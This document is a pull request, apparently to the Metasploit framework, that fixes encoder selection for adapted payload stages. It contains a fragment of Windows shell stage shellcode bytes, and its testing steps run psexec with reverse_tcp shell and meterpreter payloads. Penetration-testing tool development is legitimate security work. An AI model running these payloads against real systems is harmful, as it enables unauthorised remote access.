### PR TITLE
Fix adapted payload stage encoding

### DIFF
--- a/lib/msf/core/encoded_payload.rb
+++ b/lib/msf/core/encoded_payload.rb
@@ -136,8 +136,6 @@ class EncodedPayload
     # If the exploit needs the payload to be encoded, we need to run the list of
     # encoders in ranked precedence and try to encode with them.
     if needs_encoding
-      encoders = pinst.compatible_encoders
-
       # Make sure the encoder name from the user has the same String#encoding
       # as the framework's list of encoder names so we can compare them later.
       # This is important for when we get input from RPC.
@@ -151,6 +149,8 @@ class EncodedPayload
       elsif (reqs['Encoder'])
         wlog("#{pinst.refname}: Failed to find preferred encoder #{reqs['Encoder']}")
         raise NoEncodersSucceededError, "Failed to find preferred encoder #{reqs['Encoder']}"
+      else
+        encoders = compatible_encoders
       end
 
       encoders.each { |encname, encmod|
@@ -557,6 +557,20 @@ protected
     end
 
     false
+  end
+
+  def compatible_encoders
+    arch = reqs['Arch'] || pinst.arch
+    platform = reqs['Platform'] || pinst.platform
+
+    encoders = []
+
+    framework.encoders.each_module_ranked(
+      'Arch' => arch, 'Platform' => platform) { |name, mod|
+      encoders << [ name, mod ]
+    }
+
+    encoders
   end
 end
 

--- a/lib/msf/core/payload.rb
+++ b/lib/msf/core/payload.rb
@@ -62,15 +62,14 @@ class Payload < Msf::Module
     # If this is an adapted or staged payload but there is no stage information,
     # then this is actually a stager + single combination.  Set up the
     # information hash accordingly.
-    if (self.class.include?(Msf::Payload::Adapter) || self.class.include?(Msf::Payload::Single)) and
-      self.class.include?(Msf::Payload::Stager)
-      self.module_info['Stage'] = {}
+    if (self.class.include?(Msf::Payload::Adapter) || self.class.include?(Msf::Payload::Single)) and self.class.include?(Msf::Payload::Stager)
 
       if self.module_info['Payload']
         self.module_info['Stage']['Payload']  = self.module_info['Payload']['Payload'] || ""
         self.module_info['Stage']['Assembly'] = self.module_info['Payload']['Assembly'] || ""
         self.module_info['Stage']['Offsets']  = self.module_info['Payload']['Offsets'] || {}
-      else
+      elsif !self.module_info['Stage']
+        self.module_info['Stage'] = {}
         self.module_info['Stage']['Payload']  = ""
         self.module_info['Stage']['Assembly'] = ""
         self.module_info['Stage']['Offsets']  = {}
@@ -136,6 +135,8 @@ class Payload < Msf::Module
   #
   def payload_type_s
     case payload_type
+      when Type::Adapter
+        return "adapter"
       when Type::Stage
         return "stage"
       when Type::Stager

--- a/lib/msf/core/payload/adapter.rb
+++ b/lib/msf/core/payload/adapter.rb
@@ -3,6 +3,15 @@ module Msf::Payload::Adapter
   # size can't be a single value and must be set to dynamic
   CachedSize = :dynamic
 
+  def initialize(info={})
+    super
+
+    if self.is_a?(Msf::Payload::Stager)
+      self.stage_arch = Rex::Transformer.transform(module_info['AdaptedArch'], Array, [ String ], 'AdaptedArch')
+      self.stage_platform = Msf::Module::PlatformList.transform(module_info['AdaptedPlatform'])
+    end
+  end
+
   def compatible?(mod)
     if mod.type == Msf::MODULE_PAYLOAD
       return false if Set.new([module_info['AdaptedArch']]) != mod.arch.to_set

--- a/lib/msf/core/payload/stager.rb
+++ b/lib/msf/core/payload/stager.rb
@@ -8,9 +8,14 @@ module Msf::Payload::Stager
 
   include Msf::Payload::TransportConfig
 
+  attr_accessor :stage_arch
+  attr_accessor :stage_platform
+
   def initialize(info={})
     super
 
+    self.stage_arch = self.arch
+    self.stage_platform = self.platform
     register_advanced_options(
       [
         Msf::OptBool.new("EnableStageEncoding", [ false, "Encode the second stage payload", false ]),
@@ -288,7 +293,9 @@ module Msf::Payload::Stager
         'Encoder'            => stage_enc_mod,
         'EncoderOptions'     => { 'SaveRegisters' => saved_registers },
         'ForceSaveRegisters' => true,
-        'ForceEncode'        => true)
+        'ForceEncode'        => true,
+        'Arch'               => self.stage_arch,
+        'Platform'           => self.stage_platform)
 
       if encp.encoder
         if stage_enc_mod

--- a/modules/payloads/stages/windows/shell.rb
+++ b/modules/payloads/stages/windows/shell.rb
@@ -44,12 +44,12 @@ module MetasploitModule
             "\x86\xFF\xD5\x89\xE0\x4E\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF" +
             "\xD5\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C" +
             "\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
+        },
+      'DefaultOptions' =>
+        {
+          # Stage encoding is safe for this payload
+          'EnableStageEncoding' => true
         }
       ))
-  end
-
-  # Stage encoding is safe for this payload
-  def encode_stage?
-    true
   end
 end


### PR DESCRIPTION
This fixes issue #17720 where payloads that were adapted were failing when stage encoding was enabled. This was due to the stage encoding assuming that the stage arch+platform were the same as the payload / stager. The adapters break this assumption by allowing them to be different values.

This update modifies the Stager mixin to use the new `stage_arch` and `stage_platform` values for determining compatible encoders. These new attributes default to the payload values but are set to the adapted values by adapted payloads. This ensures that the stage is able to be encoded correctly by properly selecting a compatible encoder. The `EncodedPayload` class was also updated to allow an explicit `Arch` and `Platform` to be specified which is used by the stager to pass the stage information for use instead of the original payloads.

This also updates the Windows shell stage to honor the `EnableStageEncoding` option by not overriding `enable_stage?`. Instead the `EnableStageEncoding` option is set as a default value since it makes sense but this way users can still turn it off if they'd like.

## Verification

Start msfconsole and try payloads in staged and unstaged configurations that are both adapted and not adapted.

- [x] Start msfconsole and use the psexec module. Set all options as appropriate including the RHOST, authentication information and LHOST
- [x] Try each of the following combinations and see that they all work:
    - [x] `run TARGET=Command PAYLOAD=cmd/windows/powershell/shell/reverse_tcp EnableStageEncoding=true`
        * This demonstrates that the original issue was fixed. Without these changes, this would fail. See the output that the stage is encoded with the "Encoded stage with..." message.
    - [x] `run TARGET=Command PAYLOAD=cmd/windows/powershell/shell/reverse_tcp EnableStageEncoding=false`
        * This demonstrates that the change to the shell stage allows the EnableStageEncoding option to be set. See in the output that the stage is not encoded.
    - [x] `run TARGET=Command PAYLOAD=cmd/windows/powershell/shell_reverse_tcp`
        * This demonstrates an unstaged, adapted payload still works.
    - [x] `run TARGET=Automatic PAYLOAD=windows/x64/meterpreter/reverse_tcp EnableStageEncoding=true`
        * This demonstrates that a staged, non-adapted payload still works with stage encoding.